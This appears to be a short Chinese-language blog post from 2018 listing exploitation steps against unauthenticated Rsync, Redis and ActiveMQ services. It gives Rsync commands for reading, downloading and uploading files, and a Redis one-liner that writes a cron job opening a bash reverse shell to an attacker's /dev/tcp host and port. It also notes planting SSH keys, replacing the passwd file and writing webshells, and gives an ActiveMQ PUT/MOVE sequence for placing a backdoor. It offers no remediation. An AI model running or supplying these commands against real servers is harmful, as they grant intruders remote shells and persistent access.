Xcnte

常见漏洞利用方式
记录一些常见服务器容器/框架漏洞利用方法
扫描右侧二维码阅读全文
25
2018/05

常见漏洞利用方式

记录一些常见服务器容器/框架漏洞利用方法

Rsync 未授权访问漏洞

对应端口:873

Rsync 是 linux 下一款文件同步工具。

1.读取文件

root@kali:~# rsync 192.168.3.XXX::
root@kali:~# rsync 192.168.3.XXX:: routing //查看 routing 目录

2.下载文件

root@kali:~#rsync -avz 192.168.3.xxx:: routing/x.txt /root //下载 routing 目录下的 x.txt 到本地

3.上传文件

root@kali:~# rsync -avz x.php 192.168.3.xxx:: routing

Redis 服务器远程执行漏洞

对应端口:6379

Redis 是一个 key-value 存储系统,是一个高性能的 key-value 数据库。

1.连接服务

root@kali:~/{redis_dir}/src# ./redis-cli -h {sender_ip} -p {sender_port}

2.反弹权限

root@kali:~/{redis_dir}/src# echo -e "\n\n */1 * * * * /bin/bash -i >&/dev/tcp/{receiver_ip}/{receiver_port}>&1\n\n"|/root/{redis_dir}/src/redis-cli -h {sender_ip} -p {sender_port} -x set {sending_cycle(min)}

3.其他姿势

    写入 SSH 的 key,然后利用 key 远程登录;
    替换 redis 服务器 passwd 文件;
    写入网马(前提需要找到网站路径);

ActiveMQ 远程代码执行漏洞

对应端口:8161

ActiveMQ 是 Apache 出品,最流行的,能力强劲的开源消息总线。
注意:本漏洞需要 ActiveMQ 服务的密码。

1.写入文件

PUT /dir/x.php
POST {backdoor_code}

2.移动文件

MOVE /dir/x.php
Destination: file://{local_path_of_backdoor}

摘自《混在运维部的安全员说“端口与口令安全”》,仅用作记录用途。

Last modification:December 24th, 2018 at 03:01 pm
听说打赏我的人,都进了福布斯排行榜

Leave a Comment